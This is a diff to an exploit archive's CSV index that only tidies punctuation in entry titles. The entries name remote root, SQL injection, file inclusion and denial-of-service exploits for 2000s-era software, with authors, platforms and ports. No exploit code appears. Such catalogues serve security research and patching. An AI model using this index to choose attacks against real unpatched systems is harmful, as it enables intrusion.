diff --git a/files.csv b/files.csv index a3063b22a..82d2cc988 100755 --- a/files.csv +++ b/files.csv @@ -291,7 +291,7 @@ id,file,description,date,author,platform,type,port 309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection Exploit",2004-07-04,"Nasir Simbolon",php,webapps,0 310,platforms/windows/remote/310.txt,"Microsoft Internet Explorer Remote Application.Shell Exploit",2004-07-09,Jelmer,windows,remote,0 311,platforms/multiple/remote/311.pl,"MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit",2004-07-10,"Eli Kara",multiple,remote,3306 -312,platforms/windows/dos/312.txt,"Norton AntiVirus Denial of Service Vulnerability",2004-07-12,"Bipin Gautam",windows,dos,0 +312,platforms/windows/dos/312.txt,"Norton AntiVirus - Denial of Service Vulnerability",2004-07-12,"Bipin Gautam",windows,dos,0 313,platforms/windows/remote/313.txt,"Microsoft Outlook Express Window Opener Vulnerability",2004-07-13,N/A,windows,remote,0 315,platforms/windows/remote/315.txt,"Microsoft Outlook Express Javascript Execution Vulnerability",2004-07-13,N/A,windows,remote,0 316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0 @@ -321,7 +321,7 @@ id,file,description,date,author,platform,type,port 346,platforms/linux/remote/346.c,"Solaris /bin/login Remote Root Exploit (SPARC/x86)",2001-12-20,Teso,linux,remote,23 347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow Exploit",2002-05-14,Teso,linux,remote,0 348,platforms/linux/remote/348.c,"wu-ftpd <= 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21 -349,platforms/multiple/remote/349.txt,"SSH (x2) Remote Root Exploit",2002-05-01,Teso,multiple,remote,22 +349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Root Exploit",2002-05-01,Teso,multiple,remote,22 350,platforms/windows/local/350.c,"Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 351,platforms/windows/local/351.c,"Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0 352,platforms/windows/local/352.c,"Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0 @@ -681,7 +681,7 @@ id,file,description,date,author,platform,type,port 860,platforms/php/webapps/860.c,"Aztek Forum <= 4.0 [myadmin.php] Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service Exploit",2005-03-07,RusH,windows,dos,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI <= 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0 -863,platforms/windows/local/863.cpp,"RealPlayer 10 - (.smil) File Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 +863,platforms/windows/local/863.cpp,"RealPlayer 10 - (.smil File) Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 865,platforms/php/webapps/865.txt,"PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit",2005-03-08,Silentium,php,webapps,0 @@ -1333,7 +1333,7 @@ id,file,description,date,author,platform,type,port 1593,platforms/windows/dos/1593.c,"Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit",2006-03-19,Omni,windows,dos,0 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit",2006-03-19,LOTFREE,php,webapps,0 1595,platforms/php/webapps/1595.php,"gCards <= 1.45 - Multiple Vulnerabilities All-In-One Exploit",2006-03-20,rgod,php,webapps,0 -1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation Exploit",2006-03-20,"H D Moore",linux,local,0 +1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) - Local Root Privilege Escalation Exploit",2006-03-20,"H D Moore",linux,local,0 1597,platforms/asp/webapps/1597.pl,"ASPPortal <= 3.1.1 (downloadid) Remote SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0 1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6.0 (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0 1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0 @@ -1352,7 +1352,7 @@ id,file,description,date,author,platform,type,port 1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 [Multiple Vulnerabilities] Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 [Multiple Vulnerabilities] Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 -1615,platforms/windows/dos/1615.txt,"Microsoft Office Products Array Index Bounds Error (unpatched) PoC",2006-03-27,posidron,windows,dos,0 +1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (Unpatched) PoC",2006-03-27,posidron,windows,dos,0 1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 (myadmin.php) User Privilege Escalation Exploit",2006-03-26,Sparah,php,webapps,0 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - (sendpassword.php) SQL Injection Exploit",2006-03-28,rgod,php,webapps,0 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)",2006-03-28,No_Face_King,php,webapps,0 @@ -1426,8 +1426,8 @@ id,file,description,date,author,platform,type,port 1705,platforms/php/webapps/1705.pl,"Simplog <= 0.9.3 (tid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0 -1708,platforms/windows/dos/1708.txt,"Skulltag <= 0.96f (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0 -1709,platforms/multiple/dos/1709.txt,"OpenTTD <= 0.4.7 (multiple vulnerabilities) Denial of Service Exploit",2006-04-23,"Luigi Auriemma",multiple,dos,0 +1708,platforms/windows/dos/1708.txt,"Skulltag <= 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0 +1709,platforms/multiple/dos/1709.txt,"OpenTTD <= 0.4.7 - (multiple vulnerabilities) Denial of Service Exploit",2006-04-23,"Luigi Auriemma",multiple,dos,0 1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 (index.php page) PHP Code Insertion Vulnerability",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review <= 2B Remote File Inclusion Vulnerability",2006-04-23,"Camille Myers",php,webapps,0 1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) Multiple Vulnerabilities PoC",2006-04-24,"Tom Ferris",osx,dos,0 @@ -1441,7 +1441,7 @@ id,file,description,date,author,platform,type,port 1720,platforms/php/webapps/1720.pl,"Invision Power Board <= 2.1.5 (lastdate) Remote Code Execution Exploit",2006-04-26,RusH,php,webapps,0 1721,platforms/windows/dos/1721.pl,"BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow PoC",2006-04-27,"Dedi Dwianto",windows,dos,0 1722,platforms/php/webapps/1722.txt,"TopList <= 1.3.8 (phpBB Hack) Remote File Inclusion Vulnerability",2006-04-27,[Oo],php,webapps,0 -1723,platforms/php/webapps/1723.txt,"Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability",2006-04-28,[Oo],php,webapps,0 +1723,platforms/php/webapps/1723.txt,"Advanced GuestBook <= 2.4.0 - (phpBB) File Inclusion Vulnerability",2006-04-28,[Oo],php,webapps,0 1724,platforms/php/webapps/1724.pl,"TopList <= 1.3.8 (phpBB Hack) Remote Inclusion Exploit",2006-04-28,FOX_MULDER,php,webapps,0 1725,platforms/php/webapps/1725.pl,"Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit",2006-04-28,n0m3rcy,php,webapps,0 1726,platforms/php/webapps/1726.pl,"Invision Power Board <= 2.1.5 - search.php Remote Code Execution Exploit",2006-04-29,"Javier Olascoaga",php,webapps,0 @@ -1492,23 +1492,23 @@ id,file,description,date,author,platform,type,port 1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include Vulnerability",2006-05-12,Kacper,php,webapps,0 1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 1781,platforms/windows/dos/1781.txt,"outgun <= 1.0.3 bot 2 - Multiple Vulnerabilities Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 -1782,platforms/windows/dos/1782.txt,"Empire <= 4.3.2 (strncat) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 -1783,platforms/windows/dos/1783.txt,"Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 +1782,platforms/windows/dos/1782.txt,"Empire <= 4.3.2 - (strncat) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 +1783,platforms/windows/dos/1783.txt,"Genecys <= 0.2 - (BoF/NULL pointer) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1784,platforms/windows/dos/1784.txt,"raydium <= svn 309 - Multiple Vulnerabilities Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 1787,platforms/windows/remote/1787.py,"freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit",2006-05-15,"Tauqeer Ahmad",windows,remote,22 1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (meta)",2006-05-15,y0,windows,remote,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0 -1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication - Auth Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900 -1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0 +1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900 +1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0 1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900 1795,platforms/php/webapps/1795.txt,"ezusermanager <= 1.6 - Remote File Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0 1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0 1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0 -1798,platforms/php/webapps/1798.txt,"Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability",2006-05-17,nukedx,php,webapps,0 -1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners",2006-05-17,class101,multiple,remote,0 +1798,platforms/php/webapps/1798.txt,"Quezza BB <= 1.0 - (quezza_root_path) File Inclusion Vulnerability",2006-05-17,nukedx,php,webapps,0 +1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Vulnerability Scanner",2006-05-17,class101,multiple,remote,0 1800,platforms/php/webapps/1800.txt,"ScozNews <= 1.2.1 (mainpath) Remote File Inclusion Vulnerability",2006-05-17,Kacper,php,webapps,0 1801,platforms/multiple/dos/1801.txt,"libextractor <= 0.5.13 - Multiple Heap Overflow PoC Exploits",2006-05-17,"Luigi Auriemma",multiple,dos,0 1802,platforms/multiple/dos/1802.html,"Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit",2006-05-18,"Gianni Amato",multiple,dos,0 @@ -1528,7 +1528,7 @@ id,file,description,date,author,platform,type,port 1817,platforms/php/webapps/1817.txt,"Docebo <= 3.0.3 - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar <= 4.0.3 - Multiple (XSS/SQL) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 1819,platforms/multiple/dos/1819.txt,"PunkBuster < 1.229 (WebTool Service) Remote Buffer Overflow DoS",2006-05-23,"Luigi Auriemma",multiple,dos,0 -1820,platforms/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit",2006-05-23,"Luigi Auriemma",multiple,dos,0 +1820,platforms/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 - (frameNum) Server Terminiation Exploit",2006-05-23,"Luigi Auriemma",multiple,dos,0 1821,platforms/php/webapps/1821.php,"Drupal <= 4.7 (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 1823,platforms/php/webapps/1823.txt,"BASE <= 1.2.4 melissa (Snort Frontend) Remote Inclusion Vulnerabilities",2006-05-25,str0ke,php,webapps,0 1824,platforms/php/webapps/1824.txt,"open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability",2006-05-25,Kacper,php,webapps,0 @@ -1537,7 +1537,7 @@ id,file,description,date,author,platform,type,port 1827,platforms/php/webapps/1827.txt,"V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability",2006-05-25,beford,php,webapps,0 1828,platforms/php/webapps/1828.txt,"DoceboLms <= 2.0.5 (help.php) Remote File Include Vulnerability",2006-05-25,beford,php,webapps,0 1829,platforms/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Include Vulnerabilities",2006-05-25,Kacper,php,webapps,0 -1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff <= 3.8.2) Local Stack Buffer Overflow PoC",2006-05-26,nitr0us,linux,local,0 +1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff <= 3.8.2) - Local Stack Buffer Overflow PoC",2006-05-26,nitr0us,linux,local,0 1832,platforms/php/webapps/1832.txt,"Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability",2006-05-26,beford,php,webapps,0 1833,platforms/asp/webapps/1833.txt,"qjForum (member.asp) SQL Injection Vulnerability",2006-05-26,ajann,asp,webapps,0 1834,platforms/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL/XSS Vulnerabilities",2006-05-26,ajann,asp,webapps,0 @@ -1550,7 +1550,7 @@ id,file,description,date,author,platform,type,port 1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web <= 0.8x Remote (Include / XSS) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 1842,platforms/php/webapps/1842.htm,"Eggblog < 3.07 - Remote (SQL Injection / Privilege Escalation) Exploit",2006-05-28,nukedx,php,webapps,0 1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x - Multiple Remote File Inclusion Vulnerabilities",2006-05-28,nukedx,php,webapps,0 -1844,platforms/php/webapps/1844.txt,"Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability",2006-05-28,nukedx,php,webapps,0 +1844,platforms/php/webapps/1844.txt,"Activity MOD Plus <= 1.1.0 - (phpBB Mod) File Inclusion Vulnerability",2006-05-28,nukedx,php,webapps,0 1845,platforms/asp/webapps/1845.txt,"ASPSitem <= 2.0 - Remote (SQL Injection / DB Disclosure) Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 1846,platforms/php/webapps/1846.txt,"Blend Portal <= 1.2.0 (phpBB Mod) Remote File Inclusion Vulnerability",2006-05-28,nukedx,php,webapps,0 1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability",2006-05-28,Vympel,php,webapps,0 @@ -1614,12 +1614,12 @@ id,file,description,date,author,platform,type,port 1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x (root) Remote File Include Vulnerability",2006-06-12,"Federico Fazzi",php,webapps,0 1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0 1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0 -1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability",2006-06-13,Kacper,php,webapps,0 +1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 - (phpbb_root_path) File Include Vulnerability",2006-06-13,Kacper,php,webapps,0 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0 1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) Vulnerability PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 1911,platforms/windows/local/1911.c,"Microsoft Windows 2000/XP - (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 -1912,platforms/php/webapps/1912.txt,"The Bible Portal Project <= 2.12 (destination) File Include Vulnerability",2006-06-14,Kacper,php,webapps,0 -1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 (template.php) File Include Vulnerability",2006-06-14,"Federico Fazzi",php,webapps,0 +1912,platforms/php/webapps/1912.txt,"The Bible Portal Project <= 2.12 - (destination) File Include Vulnerability",2006-06-14,Kacper,php,webapps,0 +1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 - (template.php) File Include Vulnerability",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit (meta)",2006-06-15,c0rrupt,windows,remote,0 1916,platforms/php/webapps/1916.txt,"DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities",2006-06-15,"Andreas Sandblad",php,webapps,0 @@ -1665,7 +1665,7 @@ id,file,description,date,author,platform,type,port 1956,platforms/php/webapps/1956.txt,"Pearl For Mambo <= 1.6 - Multiple Remote File Include Vulnerabilities",2006-06-27,Kw3[R]Ln,php,webapps,0 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit",2006-06-27,simo64,php,webapps,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0 -1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability",2006-06-28,marriottvn,php,webapps,0 +1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include Vulnerability",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 @@ -1738,7 +1738,7 @@ id,file,description,date,author,platform,type,port 2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - prctl() Local Root Exploit (logrotate)",2006-07-18,"Marco Ivaldi",linux,local,0 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0 -2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0 +2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0 2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0 2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0 @@ -2031,9 +2031,9 @@ id,file,description,date,author,platform,type,port 2336,platforms/php/webapps/2336.pl,"Socketwiz Bookmarks <= 2.0 (root_dir) Remote File Include Exploit",2006-09-09,Kacper,php,webapps,0 2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager <= 3.2 (id) Remote SQL Injection Vulnerability",2006-09-09,MercilessTurk,php,webapps,0 2338,platforms/linux/local/2338.c,"openmovieeditor <= 0.0.20060901 (name) Local Buffer Overflow Exploit",2006-09-09,Qnix,linux,local,0 -2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager <= 3.2 (classified_path) File Include Vulnerability",2006-09-09,MercilessTurk,php,webapps,0 +2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager <= 3.2 - (classified_path) File Include Vulnerability",2006-09-09,MercilessTurk,php,webapps,0 2340,platforms/php/webapps/2340.txt,"PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability",2006-09-10,"Philipp Niedziela",php,webapps,0 -2341,platforms/php/webapps/2341.txt,"Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability",2006-09-10,Eddy_BAck0o,php,webapps,0 +2341,platforms/php/webapps/2341.txt,"Open Bulletin Board <= 1.0.8 - (root_path) File Include Vulnerability",2006-09-10,Eddy_BAck0o,php,webapps,0 2342,platforms/php/webapps/2342.txt,"mcGalleryPRO <= 2006 (path_to_folder) Remote Include Vulnerability",2006-09-10,Solpot,php,webapps,0 2343,platforms/php/webapps/2343.txt,"MiniPort@l <= 0.1.5 beta (skiny) Remote File Include Vulnerability",2006-09-11,Kacper,php,webapps,0 2344,platforms/php/webapps/2344.txt,"OPENi-CMS <= 1.0.1beta (config) Remote File Include Vulnerability",2006-09-11,basher13,php,webapps,0 @@ -2121,16 +2121,16 @@ id,file,description,date,author,platform,type,port 2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (SP2) (pl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 2427,platforms/php/webapps/2427.txt,"Polaring <= 0.04.03 (general.php) Remote File Include Vulnerability",2006-09-25,Drago84,php,webapps,0 2428,platforms/php/webapps/2428.txt,"PBLang <= 4.66z (temppath) Remote File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 -2429,platforms/php/webapps/2429.txt,"Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 +2429,platforms/php/webapps/2429.txt,"Minerva <= 2.0.21 build 238a - (phpbb_root_path) File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 2431,platforms/php/webapps/2431.txt,"evoBB <= 0.3 (path) Remote File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 2432,platforms/php/webapps/2432.txt,"BrudaNews <= 1.1 (admin/index.php) Remote File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 2433,platforms/php/webapps/2433.txt,"BrudaGB <= 1.1 (admin/index.php) Remote File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 -2434,platforms/php/webapps/2434.txt,"faceStones personal <= 2.0.42 (fs_form_links.php) File Include Vuln",2006-09-25,SHiKaA,php,webapps,0 +2434,platforms/php/webapps/2434.txt,"faceStones personal <= 2.0.42 - (fs_form_links.php) File Include Vuln",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"WEB//NEWS <= 1.4 - (parser.php) Remote File Include Vulnerability",2006-09-26,ThE-WoLf-KsA,php,webapps,0 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Include Vulnerability",2006-09-26,Drago84,php,webapps,0 2437,platforms/php/webapps/2437.php,"paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 (hit.php) Remote File Include Vulnerability",2006-09-26,D_7J,php,webapps,0 -2439,platforms/php/webapps/2439.txt,"Newswriter SW <= 1.42 (editfunc.inc.php) File Include Vulnerability",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 +2439,platforms/php/webapps/2439.txt,"Newswriter SW <= 1.42 - (editfunc.inc.php) File Include Vulnerability",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit",2006-09-27,"H D Moore",windows,remote,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-27,v1per-haCker,php,webapps,0 @@ -2140,7 +2140,7 @@ id,file,description,date,author,platform,type,port 2446,platforms/php/webapps/2446.php,"PPA Gallery <= 1.0 (functions.inc.php) Remote File Include Exploit",2006-09-28,Kacper,php,webapps,0 2447,platforms/php/webapps/2447.php,"KGB 1.87 (Local Inclusion) Remote Code Execution Exploit",2006-09-28,Kacper,php,webapps,0 2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (html)",2006-09-28,jamikazu,windows,remote,0 -2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 (config.inc.php) File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 +2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 - (config.inc.php) File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"phpSecurePages <= 0.28b (secure.php) Remote File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 @@ -2163,7 +2163,7 @@ id,file,description,date,author,platform,type,port 2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 2470,platforms/php/webapps/2470.txt,"phpMyProfiler <= 0.9.6 - Remote File Include Vulnerability",2006-10-03,mozi,php,webapps,0 2471,platforms/php/webapps/2471.pl,"Travelsized CMS <= 0.4 (frontpage.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 -2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS <= 5.0.1 (show_hlp.php) File Include Exploit",2006-10-03,Kacper,php,webapps,0 +2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS <= 5.0.1 - (show_hlp.php) File Include Exploit",2006-10-03,Kacper,php,webapps,0 2473,platforms/php/webapps/2473.c,"Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit",2006-10-03,1nf3ct0r,php,webapps,0 2474,platforms/php/webapps/2474.txt,"JAF CMS <= 4.0 RC1 - Multiple Remote File Include Vulnerabilities",2006-10-04,"ThE TiGeR",php,webapps,0 